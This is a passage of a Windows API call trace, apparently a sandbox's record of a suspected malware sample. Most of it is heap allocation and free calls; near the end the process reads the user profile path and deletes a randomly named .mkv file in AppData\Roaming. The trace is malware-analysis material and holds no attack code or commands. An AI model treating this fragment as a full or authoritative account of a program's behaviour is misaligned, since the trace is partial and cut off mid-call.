returned 1 [0236.246] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0236.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0236.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0236.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04070 [0236.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0236.246] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0236.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0236.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0236.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0236.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0236.246] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0236.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0236.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0236.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0236.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0236.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0236.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0236.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0236.246] FreeLibrary (hLibModule=0x756e0000) returned 1 [0236.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0236.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0236.246] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0236.246] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0236.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0236.247] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0236.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0236.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0236.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0236.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0236.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0236.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0236.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0236.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0236.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d58 [0236.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0236.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0236.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0236.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0236.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0236.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0236.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0236.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0236.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0236.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0236.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0236.247] CloseHandle (hObject=0x2a0) returned 1 [0236.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0236.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0236.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0236.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0236.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0236.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0236.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0236.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0236.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0236.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0236.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0236.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0236.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0236.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0236.251] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0236.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0236.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0236.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0236.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0236.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0236.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0236.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0236.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0236.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0236.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0236.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0236.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0236.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0236.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0236.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0236.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0236.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0236.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0236.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0236.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0236.252] CloseHandle (hObject=0x2d0) returned 1 [0236.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0236.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0236.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04810 | out: hHeap=0x970000) returned 1 [0236.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0236.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0236.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0236.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0236.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0236.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0236.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0236.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0236.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0236.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0236.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0236.256] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0236.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0236.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0236.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0236.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0236.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0236.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0236.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0236.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0236.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0236.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0236.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0236.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0236.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0236.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0236.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0236.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0236.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0236.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0236.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0236.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f940 | out: hHeap=0x970000) returned 1 [0236.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0236.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f8a0 | out: hHeap=0x970000) returned 1 [0236.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0236.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0236.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0236.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fa08 | out: hHeap=0x970000) returned 1 [0236.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0236.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0236.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0236.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7faa8 | out: hHeap=0x970000) returned 1 [0236.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0236.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f8c8 | out: hHeap=0x970000) returned 1 [0236.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0236.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f8f0 | out: hHeap=0x970000) returned 1 [0236.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0236.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7faf8 | out: hHeap=0x970000) returned 1 [0236.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0236.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f918 | out: hHeap=0x970000) returned 1 [0236.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0236.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0236.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0236.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f990 | out: hHeap=0x970000) returned 1 [0236.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0236.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0236.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040a8 | out: hHeap=0x970000) returned 1 [0236.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0236.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fa30 | out: hHeap=0x970000) returned 1 [0236.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0236.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0236.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0236.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0236.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0236.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0236.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f9e0 | out: hHeap=0x970000) returned 1 [0236.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0236.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f9b8 | out: hHeap=0x970000) returned 1 [0236.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0236.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0236.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0236.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fad0 | out: hHeap=0x970000) returned 1 [0236.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0236.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0236.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0236.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f850 | out: hHeap=0x970000) returned 1 [0236.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0236.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0236.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0236.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0236.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0236.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0236.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0236.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0236.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0236.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0236.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0236.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0236.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0236.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0236.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0236.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0236.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0236.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0236.300] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0236.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0236.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0236.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0236.300] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0236.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0236.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0236.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0236.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0236.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0236.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0236.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0236.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0236.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0236.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0236.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0236.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0236.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0236.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0236.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0236.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0236.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x64) returned 0x2e564e0 [0236.301] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/P22ObdW9p9DNX.mkv", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\P22ObdW9p9DNX.mkv", lpFilePart=0x8cedf4*="P22ObdW9p9DNX.mkv") returned 0x31 [0236.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0236.302] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\P22ObdW9p9DNX.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\p22obdw9p9dnx.mkv")) returned 0x20 [0236.302] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\P22ObdW9p9DNX.mkv", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41883640, ftCreationTime.dwHighDateTime=0x1d5e97c, ftLastAccessTime.dwLowDateTime=0xeefa6880, ftLastAccessTime.dwHighDateTime=0x1d5ea02, ftLastWriteTime.dwLowDateTime=0xeefa6880, ftLastWriteTime.dwHighDateTime=0x1d5ea02, nFileSizeHigh=0x0, nFileSizeLow=0xd180, dwReserved0=0x1, dwReserved1=0x1c, cFileName="P22ObdW9p9DNX.mkv", cAlternateFileName="P22OBD~1.MKV")) returned 0xa87050 [0236.303] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\P22ObdW9p9DNX.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\p22obdw9p9dnx.mkv")) returned 1 [0236.349] FindNextFileW (in: hFindFile=0xa87050, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41883640, ftCreationTime.dwHighDateTime=0x1d5e97c, ftLastAccessTime.dwLowDateTime=0xeefa6880, ftLastAccessTime.dwHighDateTime=0x1d5ea02, ftLastWriteTime.dwLowDateTime=0xeefa6880, ftLastWriteTime.dwHighDateTime=0x1d5ea02, nFileSizeHigh=0x0, nFileSizeLow=0xd180, dwReserved0=0x1, dwReserved1=0x1c, cFileName="P22ObdW9p9DNX.mkv", cAlternateFileName="P22OBD~1.MKV")) returned 0 [0236.349] FindClose (in: hFindFile=0xa87050 | out: hFindFile=0xa87050) returned 1 [0236.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0236.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0236.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0236.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0236.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0236.349] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0236.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0236.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0236.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0236.349] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: 